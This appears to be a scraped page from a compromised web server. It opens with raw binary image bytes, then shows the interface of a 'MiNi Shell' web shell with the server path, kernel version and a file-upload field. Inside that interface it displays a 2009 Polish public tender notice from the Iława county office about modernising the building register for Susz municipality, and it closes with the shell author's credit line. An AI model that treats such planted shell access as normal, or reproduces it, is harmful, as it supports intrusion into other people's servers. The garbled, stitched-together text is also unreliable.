JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/144920-N-2009.html

<p class="kh_header"><b>Iława: wykonanie modernizacji ewidencji gruntów i budynków - założenie ewidencji budynków i lokali dla gminy miejsko - wiejskiej Susz (obszar wiejski).</b><br>
<b>Numer ogłoszenia: 144920 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Iławie , ul. Gen. Wł. Andersa 2a, 14-200 Iława, woj. warmińsko-mazurskie, tel. 089 6490742, faks 089 6496600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ilawa-sp.bip.wm.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie modernizacji ewidencji gruntów i budynków - założenie ewidencji budynków i lokali dla gminy miejsko - wiejskiej Susz (obszar wiejski)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji ewidencji gruntów i budynków - założenie ewidencji budynków i lokali dla gminy miejsko - wiejskiej Susz ( obszar wiejski). Zgodnie z Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 29. 03. 2001 w sprawie ewidencji gruntów i budynków (Dz. U. Nr 38, poz. 454) zadanie polega na wykonaniu następujących prac: a)inwentaryzacja wszystkich budynków na terenie gminy miejsko wiejskiej Susz ( obszar wiejski ), wykonanie obmiaru budynków - pomiar miar czołowych, generalnie położenie budynków pozyskujemy z rastra mapy sytuacyjno - wysokościowej w skali 1:1000, budynki brakujące, tzn. istniejące w terenie a nie wykazane na mapie zasadniczej zamierzamy na poziomą osnowę geodezyjną; b)obliczenie powierzchni zabudowy budynków na podstawie pomierzonych miar czołowych; c)sporządzenie kart ewidencyjnych budynków i lokali, zgodnie z instrukcja G5; d)uzupełnienie map zasadniczych o nowo pomierzone budynki; e)uzupełnienie funkcjonujących systemów informatycznych, tzn. Ewopis 3.20 i Ewmapa 8.XX; f)sporządzenie operatu geodezyjno - prawnego. Warunki techniczne i rzeczowy zakres zamówienia. instrukcja techniczna G-5 - Ewidencja gruntów i budynków, instrukcja K-1 - Podstawowa mapa kraju, wytyczne techniczne K-1.2 - Mapa zasadnicza. Aktualizacja i modernizacja, instrukcja techniczna G-4 - Pomiary sytuacyjne i wysokościowe, instrukcja techniczna O-1 - Ogólne zasady wykonywania prac geodezyjnych, instrukcja techniczna O-2 - Ogólne zasady opracowania map dla celów gospodarczych, instrukcja techniczna O-3 - zasady kompletowania dokumentacji geodezyjnej i kartograficznej. 
Charakterystyka obiektu:
Gmina miejsko - wiejska  w Powiecie Iławskim ( obszar wiejski )
Powierzchnia jednostki ewidencyjnej: 25 188 ha (pow. geodezyjna 25905ha).
Liczba obrębów: 38. 
Liczba działek w jednostce ewidencyjnej: 7349. 
Liczbę budynków określono na podstawie numerycznej mapy ewidencji gruntów i budynków oraz ortofotomapy - 3425 budynków. Ze względu na fakt, że zdarzają się przypadki gdy budynek na mapie stanowi jeden obiekt, a podczas kontroli terenowej, zgodnie z kryteriami wynikającymi z rozporządzenia, okazuje się, że są to dwa lub więcej budynków, szacujemy liczbę budynków na około 4300. Skala występowania tego rodzaju przypadków jest niemożliwa do dokładnego ustalenia bez policzenia i klasyfikacji w terenie. Liczba lokali - po konsultacjach w Urzędzie Gminy i Miasta Susz, szacujemy na około 300. Ilość arkuszy map zasadniczych z budynkami w skali 1: 1000 ,1: 500 - około 470 arkuszy i mapy nieznormalizowane - wstęgi - 23 mapy.Ewentualna rozbieżność pomiędzy liczbą budynków i lokali faktycznie -  wynikowo zaewidencjonowanych a szacunkowo określonych w specyfikacji, nie stanowi podstaw do jakichkolwiek dodatkowych roszczeń finansowych zarówno przez Zamawiającego jak również  Wykonawcę.
Szczegółowy zakres przedmiotu zamówienia, w tym watunki techniczne i sposób realizacji prac określa specyfikacja istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy prawo zamówień publicznych, a więc: 1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu: -W zakresie warunku wskazanego w pkt. 1 Wykonawca przedkłada aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. -W zakresie spełniania warunku wskazanego w pkt 2. W zakresie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać, że dysponuje minimum dwiema osobami z uprawnieniami zawodowymi nadanymi przez Głównego Geodetę Kraju (Ministra Gospodarki Przestrzennej i Budownictwa lub Ministra Spraw Wewnętrznych i Administracji) w zakresie geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne. -W zakresie warunku wskazanego w pkt. 3 ocena spełniania warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia, o którym mowa w punkcie 6.1.1.1. SIWZ. -W zakresie warunku wskazanego w pkt 4. Wykonawca musi wykazać, iż nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty albo wstrzymanie w całości wykonania decyzji właściwego organu. Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń [wymienionych w części 6 siwz] zgodnie z formułą (spełnia - nie spełnia). Wykonawcy nie spełniający warunków udziału w postępowaniu zostaną wykluczeni z postępowania. Uwaga! Złożenie przez Wykonawcę nieprawdziwych informacji mających wpływ na wynik prowadzonego postępowania skutkuje wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy zobowiązani są złożyć wraz z wypełnionym i podpisanym formularzem ofertowym na załączniku Nr 1 do SIWZ, następujące dokumenty i oświadczenia: 
1. OŚWIADCZENIA: 1.1.Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określo-nych w art. 22 ust. 1 ustawy prawo zamówień publicznych, złożone na druku stanowiącym załącznik Nr 1 do formularza ofertowego; 
2. DOKUMENTY potwierdzające spełnianie przez Wykonawcę warunków, o których mowa w części 5. SIWZ: 2.1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 2.2.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału zakładu ubezpieczeń społecznych lub kasy rolniczego ubezpieczenia spo-łecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 2.3.Wykaz osób uczestniczących w realizacji zamówienia wraz z zakresem wykonywanych przez nie czynności oraz informacjami na temat ich kwalifikacji zawodowych na druku stanowiącym załącznik Nr 2 do formularza ofertowego. 2.4.Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
3. POZOSTAŁE DOKUMENTY: 3.1. Formularz cenowy 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypo-spolitej Polskiej: 4.1. zamiast dokumentu określonego w pkt 2.1. i 2.2. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu skłania ofert oraz że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty lub wstrzymanie w całości wykonania decyzji organu wystawione nie wcześniej iż 3 miesiące przed upływem terminu składania ofert. 4.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://ilawa-sp.bip-wm.pl/public/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Iławie, ul. gen. Andersa 2A, 14-200 Iława, pokój 112..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 09:00, miejsce: Starostwo Powiatowe w Iławie, ul. gen. Andersa 2A, 14-200 Iława, pokój 115 (I piętro - sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com